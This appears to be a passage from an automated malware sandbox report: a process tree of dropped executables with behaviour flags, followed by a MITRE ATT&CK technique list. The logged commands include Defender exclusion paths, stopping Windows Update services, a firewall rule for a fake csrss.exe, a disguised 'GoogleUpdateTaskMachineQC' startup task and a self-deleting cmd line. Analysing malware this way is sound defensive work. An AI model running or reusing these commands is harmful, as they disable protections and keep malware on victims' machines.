    - - C:\Users\Admin\Pictures\6vO7kiaovr3bKEveLKwqVWkW.exe
        
        "C:\Users\Admin\Pictures\6vO7kiaovr3bKEveLKwqVWkW.exe"
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:4440
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\6vO7kiaovr3bKEveLKwqVWkW.exe" & del "C:\ProgramData\*.dll"" & exit
        6⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        7⤵
        Delays execution with timeout.exe
        
        PID:4600
    - - C:\Users\Admin\Pictures\h29nA186woMosEfeurfG9Ftj.exe
        
        "C:\Users\Admin\Pictures\h29nA186woMosEfeurfG9Ftj.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3796
      - C:\Users\Admin\AppData\Local\Temp\is-L5P77.tmp\h29nA186woMosEfeurfG9Ftj.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L5P77.tmp\h29nA186woMosEfeurfG9Ftj.tmp" /SL5="$5022E,2617171,76288,C:\Users\Admin\Pictures\h29nA186woMosEfeurfG9Ftj.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:4008
    - - C:\Users\Admin\Pictures\YrpWQ8hS3zHC70jtCtFVHNbD.exe
        
        "C:\Users\Admin\Pictures\YrpWQ8hS3zHC70jtCtFVHNbD.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:488
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
      - C:\Users\Admin\Pictures\YrpWQ8hS3zHC70jtCtFVHNbD.exe
        
        "C:\Users\Admin\Pictures\YrpWQ8hS3zHC70jtCtFVHNbD.exe"
        6⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:2896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1892
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:4996
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4824
    - - C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe
        
        "C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe" --silent --allusers=0
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:4480
      - C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe
        
        C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.21 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e4474f0,0x6e447500,0x6e44750c
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2708
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\a3AqhnOM26HOLUbeJBrM7Cj8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\a3AqhnOM26HOLUbeJBrM7Cj8.exe" --version
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2136
      - C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe
        
        "C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4480 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231126221806" --session-guid=df08768b-df62-401f-8184-11ff20f8b010 --server-tracking-blob=YmUwYWEzMWZlMWZjNjQ2NjQwZWIyNDJhMGRkZDc5MWI1Y2Q0ZjBlY2JlODZiNzVhODcwODliMGRkYjYzODRiNTp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMTAzNzA4MS4zMDkxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4ZDliZTk2YS00ZGNmLTQ5NzktYjE5Yy01ZWE5ZDhkZGU4OTQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5404000000000000
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:2352
        
        C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe
        
        C:\Users\Admin\Pictures\a3AqhnOM26HOLUbeJBrM7Cj8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.21 --initial-client-data=0x2c4,0x2c8,0x2cc,0x294,0x2d0,0x6d5f74f0,0x6d5f7500,0x6d5f750c
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1808
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311262218061\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311262218061\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        6⤵
        Executes dropped EXE
        
        PID:4100
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311262218061\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311262218061\assistant\assistant_installer.exe" --version
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311262218061\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311262218061\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x238,0x254,0x1391588,0x1391598,0x13915a4
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5108
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3716
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3188
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2704
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2372
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4112
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4520
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1760
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4304
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4520
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4612
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2988
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4584
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4648
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2144
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2100
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4500
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1300
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:3836
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2416
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:424
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4056
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1192
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:896
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:4324
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:3568

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:4420

C:\Users\Admin\AppData\Roaming\ifsubgf
C:\Users\Admin\AppData\Roaming\ifsubgf
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2304
- C:\Users\Admin\AppData\Roaming\ifsubgf
  C:\Users\Admin\AppData\Roaming\ifsubgf
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1636

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery